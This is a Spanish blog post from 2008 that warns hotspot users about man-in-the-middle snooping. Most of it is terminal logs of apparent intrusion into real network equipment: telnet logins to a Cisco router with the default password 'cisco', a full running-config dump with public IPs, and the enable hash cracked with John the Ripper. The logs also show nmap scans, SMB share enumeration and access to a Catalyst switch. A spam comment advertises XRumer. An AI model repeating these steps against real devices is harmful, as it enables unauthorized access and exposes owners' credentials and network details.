sábado, 26 de enero de 2008

¿ Default passwords OR honeypot ?

''' ENERO 26 '''

Siempre se ha dicho que las claves por defecto pueden ser peligrosas, obviamete si alguien quiere abusar de ellas.

Alguien anonimo me escribio y me mostro esto, nunca supe quien fue, no se que significa y no entiendo las implicaciones del caso. Lo unico que el me dice es que no hay que preocuparse tanto por la infraestructura en sí, que hay que preocuparse por los usuarios de esa red y los ataques de hombre en medio.
Pense acerca de eso y llegue a la conclusion de que es verdad, a muchas compañias fuera de su propia seguridad, le deberia interesar la seguridad de la informacion de sus usuarios.

ideas off topic:

Los hotspots, estaran de moda mucho mas tiempo, los filtros para que solo accedan usuarios validos son vulnerables, las restricciones basicas estan mandadas a recoger, JUNTAR redes administrativas y publicas en HOtspots vuelve el asunto mas HOT.

En resumen:
Cuando se conecte a un HotspoT, por favor verifique que efectivamente sÍ esta navegando a traves del HotspoT y no por medio de alguien mas que estará seguramente capturando sus cookies, sus sesiones, sus claves, sus charlas de MSN, sus charlas de GTALK, AIM, AOL, ICQ, JABBER.

En resumen2:
Nunca podra saber si esta navegando a traves del HotspoT o por medio de alguien, lo siento, el resumen lo cambio a:
Si esta en un HotspoT, no haga cosas importantes, como por ejemplo hablar de usted, decir lo que piensa, hacer citas, describirse, opinar en foros, chats, esto le permitirá a ese usuario perfiilarlo y con eso encontrar sus claves. Lo peor es que siempre podrá encontrar sus claves así las cambie, porque ya lo conoce.


En una ciudad (es peor?):

debian:/# telnet 192.168.1.252
Trying 192.168.1.252...
Connected to 192.168.1.252.
Escape character is '^]'.


User Access Verification

Password:
Router_NAT_Puente_Aereo>enable
Password:
Router_NAT_Puente_Aereo#

then ...

cocolizo@debian:~$ smbclient -L 192.168.1.25
Password:
Domain=[GERENCIA] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
D$ Disk Default share
print$ Disk Printer Drivers
SharedDocs Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
session request to 192.168.1.25 failed (Called name not present)
session request to 192 failed (Called name not present)
Domain=[GERENCIA] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------
perezgil@debian:~$

then ...

debian:/# nmap 192.168.1.252

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-11-16 06:18 COT
Interesting ports on 192.168.1.252:
Not shown: 1679 closed ports
PORT STATE SERVICE
23/tcp open telnet
MAC Address: 00:04:DD:0C:BD:F3 (Cisco Systems)

Nmap finished: 1 IP address (1 host up) scanned in 8.335 seconds
debian:/home/testing/Desktop/nmbscan-1.2.4# nmap 192.168.1.253

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-11-16 06:19 COT
Interesting ports on 192.168.1.253:
Not shown: 1678 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
MAC Address: 00:0A:41:23:AC:00 (Cisco Systems)

Nmap finished: 1 IP address (1 host up) scanned in 9.633 seconds
debian:/#

then ...

debian:/home/police/portatil# cat log4
Router_NAT_Puente_Aereo#show running-config
Building configuration...

Current configuration : 1458 bytes
!
version 12.2
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Router_NAT_Puente_Aereo
!
logging buffered 51200 warnings
enable secret 5 $1$e.68$du0SEpfijiA228uacanXU1
!
memory-size iomem 15
clock timezone BOGOTA -5
ip subnet-zero
!
!
ip name-server 200.13.249.101
ip name-server 200.75.78.78
ip dhcp excluded-address 192.168.1.1 192.168.1.11
!
ip dhcp pool pteaereo
network 192.168.1.0 255.255.255.0
dns-server 200.13.249.101 200.75.78.78
default-router 192.168.1.252
lease 0 0 30
!
ip dhcp-server 192.168.254.252
!
!
interface Ethernet0/0
description Conexion al Switch LAN WiFi
ip address 192.168.1.252 255.255.255.0
ip nat inside
load-interval 30
half-duplex
no cdp enable
hold-queue 100 out
!
interface FastEthernet0/0
description Conexion Back-to-back al CPE
ip address 201.232.227.234 255.255.255.248
ip nat outside
load-interval 30
speed auto
no cdp enable
hold-queue 100 out
!
ip nat translation max-entries 3000
ip nat pool pteaereo 201.232.227.235 201.232.227.237 netmask 255.255.255.248
ip nat inside source list 1 pool pteaereo overload
ip classless
ip route 0.0.0.0 0.0.0.0 201.232.227.233
no ip http server
ip pim bidir-enable
!
access-list 1 permit 192.168.1.0 0.0.0.255
no cdp run
!
call rsvp-sync
!
!
mgcp profile default
!
dial-peer cor custom
!
!
!
!
line con 0
line aux 0
line vty 0 4
password cisco
login
!
no scheduler allocate
end

Router_NAT_Puente_Aereo#

then ...

just for checking, i know what it is.

debian:/home/john/john-1.7.2/run# cat ../../pass
root:$1$e.68$du0SEpfijiA228uacanXU1::::::::
debian:/home/john/portatil/john-1.7.2/run# ./john ../../pass
Loaded 1 password hash (FreeBSD MD5 [32/32])
cisco (root)
guesses: 1 time: 0:00:00:57 (3) c/s: 3165 trying: cisco
debian:/home/john/portatil/john-1.7.2/run# cat ./john.pot
$1$e.68$du0SEpfijiA228uacanXU1:cisco
debian:/home/john/portatil/john-1.7.2/run#


En otra ciudad (es mejor?):

debian:/home/scanner/portatil# cat nothing.txt
Trying 192.168.10.14...
Connected to 192.168.10.14.
Escape character is '^]'.

Catalyst 1900 Management Console
Copyright (c) Cisco Systems, Inc. 1993-1998
All rights reserved.
Enterprise Edition Software
Ethernet Address: 00-D0-C0-6D-CE-00

PCA Number: 73-3122-03
PCA Serial Number: FAB03183C6N
Model Number: WS-C1912-EN
System Serial Number: FAB0320T02R
Power Supply S/N: PHI031600M2
Power Supply P/N:
PCB Serial Number: FAB03183C6N,73-3122-03
-------------------------------------------------

1 user(s) now active on Management Console.

User Interface Menu

[M] Menus
[K] Command Line

Enter Selection: M
Enter password: ******

Incorrect password

Enter password:

Incorrect password

Enter password:

Incorrect password

Enter password:

Incorrect password

WARNING: Too many failed logon attempts.

debian:/home/babysister/portatil# cat ohyeah.txt
Trying 192.168.10.14...
Connected to 192.168.10.14.
Escape character is '^]'.

Catalyst 1900 Management Console
Copyright (c) Cisco Systems, Inc. 1993-1998
All rights reserved.
Enterprise Edition Software
Ethernet Address: 00-D0-C0-6D-CE-00

PCA Number: 73-3122-03
PCA Serial Number: FAB03183C6N
Model Number: WS-C1912-EN
System Serial Number: FAB0320T02R
Power Supply S/N: PHI031600M2
Power Supply P/N:
PCB Serial Number: FAB03183C6N,73-3122-03
-------------------------------------------------

1 user(s) now active on Management Console.

User Interface Menu

[M] Menus
[K] Command Line

Enter Selection: M
Enter password: ******

Incorrect password

Enter password:

Incorrect password

Enter password:

Incorrect password

Enter password:

Incorrect password

WARNING: Too many failed logon attempts.

debian:/home/fisher/portatil# cat Slog.txt
Trying 192.168.10.14...
Connected to 192.168.10.14.
Escape character is '^]'.


Catalyst 1900 Management Console
Copyright (c) Cisco Systems, Inc. 1993-1998
All rights reserved.
Enterprise Edition Software
Ethernet Address: 00-D0-C0-6D-CE-00

PCA Number: 73-3122-03
PCA Serial Number: FAB03183C6N
Model Number: WS-C1912-EN
System Serial Number: FAB0320T02R
Power Supply S/N: PHI031600M2
Power Supply P/N:
PCB Serial Number: FAB03183C6N,73-3122-03
-------------------------------------------------

1 user(s) now active on Management Console.

User Interface Menu

[M] Menus
[K] Command Line

Enter Selection: K


CLI session with the switch is open.
To end the CLI session, enter [Exit].

sw>show version
Cisco Catalyst 1900/2820 Enterprise Edition Software
Version V8.01.00
Copyright (c) Cisco Systems, Inc. 1993-1998
sw uptime is 11day(s) 03hour(s) 54minute(s) 49second(s)
cisco Catalyst 1900 (486sxl) processor with 2048K/1024K bytes of memory
Hardware board revision is 5
Upgrade Status: No upgrade currently in progress.
Config File Status: No configuration upload/download is in progress
15 Fixed Ethernet/IEEE 802.3 interface(s)
Base Ethernet Address: 00-D0-C0-6D-CE-00
sw>?
Exec commands:
enable Turn on privileged commands
exit Exit from the EXEC
help Description of the interactive help system
ping Send echo messages
session Tunnel to module
show Show running system information
terminal Set terminal line parameters
sw>
sw>exit

CLI session with the switch is now closed.

Press any key to continue.

1 comentario:

Anónimo dijo...

Who knows where to download XRumer 5.0 Palladium?
Help, please. All recommend this program to effectively advertise on the Internet, this is the best program!

Entradas populares